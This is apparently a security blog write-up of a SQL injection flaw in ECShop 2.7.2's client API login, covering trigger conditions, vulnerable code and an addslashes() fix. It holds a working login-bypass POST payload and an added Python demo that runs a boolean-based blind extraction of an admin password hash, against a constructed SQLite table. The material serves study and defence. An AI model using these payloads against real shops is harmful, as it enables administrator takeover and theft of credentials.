
ecshop /api/client/api.php, /api/client/includes/lib_api.php SQL Injection Vul

1. Vulnerability description  2. Trigger conditions  3. Affected scope  4. Vulnerable code analysis  5. Defence  6. Reflections on attack and defence

 

1. Vulnerability description

ECShop has a blind SQL injection vulnerability in /api/client/api.php: a specially crafted POST request reaches an unescaped SQL query, through which an attacker can read sensitive information or manipulate the database.

http://sebug.net/vuldb/ssvid-21007


2. Trigger conditions

1. /api/client/api.php does not filter the UserId parameter
2. magic_quotes_gpc = off on the server
// magic_quotes_gpc was deprecated in PHP 5.3.0 and removed in PHP 5.4.0, so by default (and on any current PHP) magic_quotes_gpc = Off

0x1: POC

http://localhost/ecshop2.7.2/api/client/api.php?Action=UserLogin
POST: UserId=%27%20or%20user_id=1%23

Decoded, UserId is ' or user_id=1# , which turns the WHERE clause into WHERE user_name = '' or user_id=1#' and so selects the administrator row with user_id = 1 whatever the user name is. Note that api.php hands $_POST to dispatch(), which reads Action from that array, so Action=UserLogin has to be sent in the POST body together with UserId.

Relevant Link:

http://php.net/manual/zh/info.configuration.php


3. Affected scope
4. Vulnerable code analysis

/api/client/api.php

<?php

define('IN_ECS', true);

include_once './includes/init.php';

// dispatch the POST data
dispatch($_POST);
?>

/api/client/includes/lib_api.php

function dispatch($post)
{
    // dispatcher table: the only Action values accepted
    $func_arr = array('GetDomain', 'UserLogin', 'AddCategory', 'AddBrand', 'AddGoods', 'GetCategory', 'GetBrand', 'GetGoods', 'DeleteBrand', 'DeleteCategory', 'DeleteGoods', 'EditBrand', 'EditCategory', 'EditGoods');
    // when $_POST['Action'] == 'UserLogin', API_UserLogin() is called with the whole POST array
    if (in_array($post['Action'], $func_arr) && function_exists('API_' . $post['Action']))
    {
        return call_user_func('API_' . $post['Action'], $post);
    }
    else
    {
        API_Error();
    }
}

/api/client/includes/lib_api.php

function API_UserLogin($post)
{
    $post['username'] = isset($post['UserId']) ? trim($post['UserId']) : '';
    $post['password'] = isset($post['Password']) ? strtolower(trim($post['Password'])) : '';

    /* check whether the password is correct */
    // $post['username'] is never escaped, which gives a blind injection: the value comes straight
    // from the raw $_POST without any preprocessing and is not covered by the core's input filtering
    $sql = "SELECT user_id, user_name, password, action_list, last_login" .
        " FROM " . $GLOBALS['ecs']->table('admin_user') .
        " WHERE user_name = '" . $post['username'] . "'";

    $row = $GLOBALS['db']->getRow($sql);
    ..

Relevant Link:

http://www.wooyun.org/bugs/wooyun-2010-02969


5. Defence

/api/client/includes/lib_api.php

function API_UserLogin($post)
{
    /* SQL injection filtering: with magic_quotes_gpc on, PHP has already escaped the value */
    if (get_magic_quotes_gpc())
    {
        $post['UserId'] = isset($post['UserId']) ? $post['UserId'] : '';
    }
    else
    {
        $post['UserId'] = isset($post['UserId']) ? addslashes($post['UserId']) : '';
    }
    /* */
    $post['username'] = isset($post['UserId']) ? trim($post['UserId']) : '';
    ..

This fix escapes only UserId, so every other value that lib_api.php concatenates into SQL needs the same treatment. get_magic_quotes_gpc() was itself deprecated in PHP 7.4.0 and removed in PHP 8.0.0, so on current PHP the first branch has to go and addslashes() alone remains. Byte-level escaping also only holds when the database connection charset matches what addslashes() assumes (multibyte charsets such as GBK are the classic failure case); binding the user name as a parameter of a prepared statement removes the problem instead of patching one call site.
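As an added worked example (not code from this page or from ECShop), the following Python script rebuilds the API_UserLogin query from section 4 over a constructed in-memory SQLite table and exercises it three ways: the page's ' or user_id=1 payload against the concatenated query, the same payload against a parameterized query (the alternative to the addslashes() fix above), and, going beyond the single payload on the page, a boolean-based blind extraction of the administrator's password hash through the row/no-row oracle. Assumptions: the ecs_ table prefix, the column list copied from the page's query, and made-up hash values. Because trim() strips the trailing space that MySQL's "-- " comment form requires, the page's POC uses #; SQLite has no # comment but accepts -- with nothing after it, so the payloads here end in --. Backslash escaping is not modelled, since SQLite string literals do not treat a backslash as an escape character.

```python
import sqlite3

# Constructed stand-in for ECShop's admin_user table (the ecs_ prefix is assumed).
# The hashes are md5-style hex strings made up for this demo, not real ECShop data.
SAMPLE_ADMINS = [
    (1, "admin", "21232f297a57a5a743894a0e4a801fc3", "all", 0),
    (2, "editor", "5f4dcc3b5aa765d61d8327deb882cf99", "goods_manage", 0),
]

# Column list taken from the query in API_UserLogin.
COLUMNS = "user_id, user_name, password, action_list, last_login"


def make_db():
    """In-memory SQLite database populated with the constructed admin rows."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE ecs_admin_user (user_id INTEGER, user_name TEXT, "
        "password TEXT, action_list TEXT, last_login INTEGER)"
    )
    con.executemany("INSERT INTO ecs_admin_user VALUES (?, ?, ?, ?, ?)", SAMPLE_ADMINS)
    return con


def vulnerable_lookup(con, user_id):
    """Mirror of API_UserLogin: trim(UserId) is concatenated straight into the WHERE clause."""
    sql = (
        "SELECT " + COLUMNS + " FROM ecs_admin_user WHERE user_name = '"
        + user_id.strip() + "'"
    )
    return con.execute(sql).fetchone()


def parameterized_lookup(con, user_id):
    """Hardened form: the value travels as a bound parameter, never as SQL text."""
    sql = "SELECT " + COLUMNS + " FROM ecs_admin_user WHERE user_name = ?"
    return con.execute(sql, (user_id.strip(),)).fetchone()


def row_returned(con, user_id):
    """Boolean oracle: does the vulnerable login query find a row for this UserId?"""
    return vulnerable_lookup(con, user_id) is not None


def extract_password_hash(con, target_user_id=1, length=32):
    """Boolean-based blind extraction through the row/no-row oracle.

    Each probe asks whether character `pos` of the target's password hash is `ch`.
    The WHERE clause becomes
        user_name = '' or (user_id=1 and substr(password,pos,1)='ch') --'
    so a row comes back exactly when the guess is right.
    """
    recovered = ""
    for pos in range(1, length + 1):
        for ch in "0123456789abcdef":
            payload = (
                f"' or (user_id={target_user_id} "
                f"and substr(password,{pos},1)='{ch}') -- "
            )
            if row_returned(con, payload):
                recovered += ch
                break
        else:
            raise RuntimeError(f"no hex digit matched at position {pos}")
    return recovered


if __name__ == "__main__":
    db = make_db()
    payload = "' or user_id=1 -- "  # SQLite form of the page's ' or user_id=1#
    print("vulnerable   :", vulnerable_lookup(db, payload))
    print("parameterized:", parameterized_lookup(db, payload))
    print("blind extract:", extract_password_hash(db))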

Relevant Link:

http://www.topit.cn/ecshop-tutorial/ecshop_mangzhu_bug_for_ecshop_v2.7.2-195.html


6. Reflections on attack and defence

Copyright (c) 2015 LittleHann All rights reserved

 
